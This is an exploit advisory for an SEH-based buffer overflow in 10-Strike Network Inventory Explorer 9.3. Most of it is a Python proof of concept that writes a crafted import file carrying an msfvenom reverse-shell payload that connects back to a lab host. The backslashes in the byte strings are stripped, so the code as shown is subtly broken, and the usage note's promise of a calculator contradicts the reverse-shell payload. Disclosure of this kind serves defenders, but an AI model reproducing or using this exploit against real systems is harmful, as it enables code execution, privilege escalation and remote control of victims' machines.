Authored by Ricardo Jose Ruiz Fernandez

10-Strike Network Inventory Explorer versions 9.3 and below are vulnerable to an SEH-based buffer overflow that leads to code execution or local privilege escalation. The vulnerable part of the program is the functionality that adds computers from a text file.

I. VULNERABILITY
-------------------------
10-Strike Network Inventory Explorer Version 9.3 - Privilege Escalation through SEH based Buffer Overflow


II. VENDOR
-------------------------
10-Strike Network (https://www.10-strike.com/)


III. DESCRIPTION
-------------------------

10-Strike Network Inventory Explorer, up to and including the latest version (9.3), is vulnerable to an SEH-based buffer overflow that leads to code execution or local privilege escalation. The vulnerable part of the program is the functionality that adds computers from a text file.


IV. EXPLOIT
-------------------------
# Exploit Title: 10-Strike Network Inventory Explorer Version 9.3 - Privilege Escalation through SEH based Buffer Overflow
# Date: 16/08/2022
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor website: https://www.10-strike.com/
# Product website: https://www.10-strike.com/networkinventoryexplorer/
# Usage: Run this script to create the file, then import it by clicking "Computers" and then "Add". It should pop a calculator


from struct import pack


# Bad chars are: x09x0ax0dx3ax5c
# Author's candidate byte list for bad-character hunting, written as hex
# escape text: the values 0x21-0xff minus the five bad characters named
# above (0x09, 0x0a, 0x0d, 0x3a, 0x5c); 0x00 is not listed either.  The two
# commented-out lines at the end hold the low ranges 0x01-0x20, which the
# author also dropped (the msfvenom -b list further down excludes the same
# values).  `badchars` is built but never referenced later in this listing;
# it is kept only as a record of the characterisation work.
badchars = (
b"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
b"x31x32x33x34x35x36x37x38x39x3bx3cx3dx3ex3fx40"
b"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
b"x51x52x53x54x55x56x57x58x59x5ax5bx5dx5ex5fx60"
b"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
b"x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
b"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
b"x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
b"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
b"xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
b"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
b"xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
b"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
b"xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
#b"x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
#b"x01x02x03x04x05x06x07x08x0bx0cx0ex0fx10"
)

# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.49.81 -b "x00x09x0ax0dx3ax5cx11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20x01x02x03x04x05x06x07x08x0bx0cx0ex0fx10" -v payload --smallest -f py
# Encoded payload stage emitted by the msfvenom command above: a
# windows/shell_reverse_tcp that connects back to LHOST 192.168.49.81 on
# LPORT 443, generated with the -b list excluded and --smallest.
# NOTE(review): this is a reverse shell, not the calculator the Usage note
# at the top mentions; the LHOST/LPORT are the author's lab values.  The
# bytes below are opaque encoder output and are not meant to be read or
# edited by hand.
payload = b""
payload += b"x89xe3xdbxd0xd9x73xf4x5bx53x59x49x49"
payload += b"x49x49x49x49x49x49x49x49x43x43x43x43"
payload += b"x43x43x37x51x5ax6ax41x58x50x30x41x30"
payload += b"x41x6bx41x41x51x32x41x42x32x42x42x30"
payload += b"x42x42x41x42x58x50x38x41x42x75x4ax49"
payload += b"x69x6cx79x78x4cx42x43x30x53x30x33x30"
payload += b"x51x70x6ex69x6bx55x30x31x69x50x61x74"
payload += b"x6cx4bx36x30x56x50x4cx4bx50x52x76x6c"
payload += b"x6ex6bx63x62x57x64x4cx4bx32x52x45x78"
payload += b"x34x4fx58x37x32x6ax54x66x56x51x49x6f"
payload += b"x6ex4cx45x6cx43x51x43x4cx74x42x34x6c"
payload += b"x51x30x69x51x5ax6fx76x6dx35x51x68x47"
payload += b"x4dx32x4cx32x32x72x33x67x4ex6bx62x72"
payload += b"x64x50x6ex6bx71x5ax65x6cx6ex6bx70x4c"
payload += b"x54x51x43x48x78x63x53x78x36x61x4ax71"
payload += b"x46x31x4ex6bx30x59x35x70x65x51x49x43"
payload += b"x4cx4bx50x49x34x58x59x73x47x4ax32x69"
payload += b"x6cx4bx66x54x6cx4bx76x61x69x46x75x61"
payload += b"x69x6fx6cx6cx69x51x5ax6fx64x4dx66x61"
payload += b"x6fx37x66x58x39x70x63x45x49x66x64x43"
payload += b"x73x4dx49x68x77x4bx51x6dx66x44x43x45"
payload += b"x5ax44x51x48x6cx4bx56x38x37x54x76x61"
payload += b"x7ax73x35x36x4ex6bx76x6cx30x4bx6cx4b"
payload += b"x46x38x47x6cx56x61x58x53x6ex6bx74x44"
payload += b"x6ex6bx45x51x38x50x6ex69x52x64x51x34"
payload += b"x37x54x33x6bx31x4bx61x71x33x69x51x4a"
payload += b"x62x71x49x6fx6bx50x31x4fx73x6fx33x6a"
payload += b"x4cx4bx62x32x5ax4bx4ex6dx31x4dx63x58"
payload += b"x55x63x55x62x43x30x73x30x73x58x33x47"
payload += b"x44x33x76x52x61x4fx46x34x51x78x42x6c"
payload += b"x34x37x54x66x57x77x79x6fx79x45x6ex58"
payload += b"x6cx50x47x71x75x50x43x30x77x59x38x44"
payload += b"x30x54x36x30x45x38x67x59x6bx30x70x6b"
payload += b"x43x30x79x6fx59x45x52x70x50x50x30x50"
payload += b"x42x70x33x70x56x30x61x50x72x70x53x58"
payload += b"x4ax4ax76x6fx79x4fx79x70x59x6fx79x45"
payload += b"x6dx47x32x4ax47x75x63x58x69x50x69x38"
payload += b"x34x71x33x61x65x38x74x42x45x50x75x51"
payload += b"x6fx4bx4ex69x38x66x31x7ax34x50x46x36"
payload += b"x31x47x32x48x6dx49x49x35x51x64x45x31"
payload += b"x79x6fx69x45x4dx55x4bx70x53x44x56x6c"
payload += b"x49x6fx72x6ex46x68x64x35x78x6cx71x78"
payload += b"x38x70x6dx65x79x32x42x76x49x6fx68x55"
payload += b"x63x58x52x43x30x6dx75x34x33x30x6cx49"
payload += b"x6ax43x63x67x52x77x33x67x50x31x79x66"
payload += b"x30x6ax62x32x53x69x76x36x59x72x4bx4d"
payload += b"x65x36x6bx77x43x74x46x44x37x4cx47x71"
payload += b"x56x61x4ex6dx73x74x77x54x66x70x4ax66"
payload += b"x33x30x43x74x30x54x70x50x51x46x76x36"
payload += b"x36x36x51x56x30x56x30x4ex72x76x62x76"
payload += b"x56x33x56x36x62x48x63x49x6ax6cx75x6f"
payload += b"x4fx76x59x6fx49x45x4dx59x6dx30x52x6e"
payload += b"x70x56x61x56x59x6fx44x70x35x38x53x38"
payload += b"x6cx47x55x4dx61x70x6bx4fx79x45x4dx6b"
payload += b"x7ax50x48x35x4dx72x43x66x50x68x6cx66"
payload += b"x7ax35x4dx6dx6fx6dx59x6fx4bx65x65x6c"
payload += b"x46x66x63x4cx55x5ax6bx30x6bx4bx6dx30"
payload += b"x51x65x75x55x4fx4bx72x67x72x33x52x52"
payload += b"x72x4fx63x5ax35x50x61x43x79x6fx39x45"
payload += b"x41x41"

#buffer = "A"*100000
# Layout of the crash file, following the author's SEH-overflow description:
#   207 filler bytes, then a 4-byte slot holding two NOPs and what looks like
#   a short jump (the nSEH position, presumably), then the SEH handler
#   address 0x61e4dab1 written little-endian (the "bp" comment records the
#   author's debugger breakpoint on it), a 2-byte NOP pad, and finally the
#   encoded payload from above.
# NOTE(review): 0x61e4dab1 is an author-observed value for the tested
# build/system; the page does not say which module it lives in.
buffer = b"A"*207
buffer += b"x90x90xebx04" # bp 0x61e4dab1; g
buffer += b"xb1xdaxe4x61"
buffer += b"x90"*2
buffer += payload

# Writes the crafted computer-list file as test.txt in the current working
# directory; this file is the only artefact the reproduction step imports.
# Defender note: the advisory names no fixed version, and the trigger is an
# imported computer-list text file, so such imports should be treated as
# untrusted input and restricted to trusted operators.
with open("test.txt", 'wb') as out:
out.write(buffer)